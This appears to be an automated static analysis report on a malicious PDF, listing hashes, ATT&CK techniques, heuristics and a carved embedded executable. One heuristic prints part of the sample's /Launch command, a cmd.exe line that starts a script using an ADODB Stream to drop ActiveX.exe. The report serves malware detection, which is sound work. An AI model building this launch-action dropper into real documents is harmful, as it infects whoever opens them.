Malicious PDF — malware analysis report

Static analysis result for SHA-256 2e6fad5b424be74c…

MALICIOUS

PDF

124.9 KB
MD5: 5c19a94cccf9cf32205b325400232873 SHA-1: 326ae79505ad1c83da043487d1884cd99caf1256 SHA-256: 2e6fad5b424be74c14534e14c1e772a451609a901268fc223622da1601e959dc
180 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File T1553.005 Mark-of-the-Web Bypass T1059.003 Windows Command Shell

The PDF contains a launch action that executes cmd.exe, which in turn is instructed to create and execute a file named ActiveX.exe. This embedded executable is likely a second-stage payload. The document body contains obfuscated strings related to the execution of cmd.exe and the creation of ActiveX.exe, indicating a clear intent to download and run a malicious payload.

Heuristics 3

  • Launch action critical PDF_LAUNCH
    PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
  • Embedded Windows executable payload in PDF stream critical PDF_EMBEDDED_PE_PAYLOAD
    PDF stream bytes contain an embedded Windows executable with a verified PE header. Exploit chains often hide droppers inside ordinary streams rather than standard /EmbeddedFile attachments.
  • /Launch action target: cmd.exe critical PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target with parameters '/c echo m=".":n="attachment.pdf" :y="c:\\windows\\system32\\ActiveX.exe":Set t=CreateObject("Adodb"+m+"Stream"' — references a known-dangerous executable (cmd, PowerShell, etc.).

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_pdf_00011b75.exe
71a27c6a66888914c362c5bb938bb0eba088152d5d125154d74223679f17f87f		 embedded-pe PDF decompressed stream PE payload at offset 0x11B75 55365 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.